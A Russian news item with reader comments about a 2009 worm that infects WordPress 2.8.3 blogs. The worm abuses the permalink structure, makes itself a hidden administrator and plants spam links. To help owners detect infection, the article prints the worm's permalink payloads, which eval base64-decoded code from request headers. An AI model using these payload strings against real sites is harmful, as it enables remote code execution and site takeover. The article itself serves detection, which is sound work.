Массовое заражение блогов на WordPress

image

Теги: Wordpress, уязвимость

В эти выходные разразилась настоящая эпидемия нового вируса, поражающего блоги на движке WordPress 2.8.3 и более ранних версий в ветке 2.8.

Месяц назад стало известно о новой критической уязвимости в WordPress 2.8.3, позволяющей легко изменить администраторский пароль в удалённом режиме. После этого вышел WordPress 2.8.4, устраняющий эту уязвимость. Однако, как оказалось, далеко не все блогеры следят за обновлениями.

В эти выходные разразилась настоящая эпидемия нового вируса, поражающего блоги на движке WordPress 2.8.3 и более ранних версий в ветке 2.8.

Червь регистрируется в блоге, запускает вредоносный код через структуру permalink и делает себя вторым админом, потом запускает скрипт для стирания себя со страницы пользователей и начинает  добавлять спам и ссылки на вредоносный контент в архивные топики.

Присутствие вредителя довольно сложно обнаружить сразу, тем более если он ещё ничего не опубликовал. Для этого нужно проверить фид permalinks/rss на присутствие следующего кода.


%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

или ошибки


‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’

Если есть такой код или фид сломан, то блог инфицирован.

Процедура удаления червя представляет собой  нетривиальную задачу.


или введите имя

CAPTCHA
никита
07-09-2009 15:42:46
причем тут свободное ПО и линукс? Хорошо что нашли. А вот если просочятся исходники платного софта - то вот это будет трындец. А то что нашли дырку в открытом софте - так это даже хорошо . будет на 1 меньше.
0 |
14964_вана на ядр
07-09-2009 22:44:14
Хорошо что нашли.Если бы вы были админом инфицированного сайта на данном движке, вам бы тоже было хорошо. Быстренько подмыться после того как тебя поимели - очень интересная концепция "безопасности". Ещё и радоваться тому, что из 10 000 дыр "ещё одну заткнули". ЗдОрово как! Ну, радуйтесь, всего-то 9 999 осталось.
0 |
07-09-2009 16:03:14
вот почему более-менее серьезные проекты используют drupal или комменческие cms, ну или джумлу (если правильно модули подобрать, хрен поломаешь). вообще мне непонятен феномен популярности вордпреса. дырок там уже наверное больше, чем в php-нюке нашли.
0 |
srupal
08-09-2009 07:59:59
ой, я вас прошу... в друпале постоянно всякую фигню находят. а коммерческие, если с закрытым кодом, то еще хуже...
0 |
67665
08-09-2009 09:41:23
На пхпнюке тоже стоит куча сайтов которые хрен поломаешь. Друпаловских же сайтов забитых спамом до фига в рунете. phpBB 2.x и Drupal вообще строго не используется никем кроме фанатов. Drupal/PHPNuke/WordPress - одного порядка проекты.
0 |
ntimmy
09-09-2009 14:13:36
IMHO тут проблема не в движке а именно php. Как не пиши все равно раз php дырявый то никакие ухищрнения не помогут.
0 |
Блоггер
07-09-2009 16:26:17
Как чувствовал. Буквально месяц назад сменил WordPress на другую блоговую CMS
0 |
50014
07-09-2009 17:49:31
(Тянет руку с задней парты) а почему на картинке к новости логотип БМВ? БМВ движок тоже поломали злые хакиры?
0 |
06790
07-09-2009 18:38:26
ты уверен, что W - это БМВ??? --------------------------------------------
0 |
07-09-2009 19:54:51
Это Volkswagen))
0 |
yura
08-09-2009 08:19:53
Это Wagen
0 |
кртофан
08-09-2009 07:38:26
умри блог! капча стесняется : 82139
0 |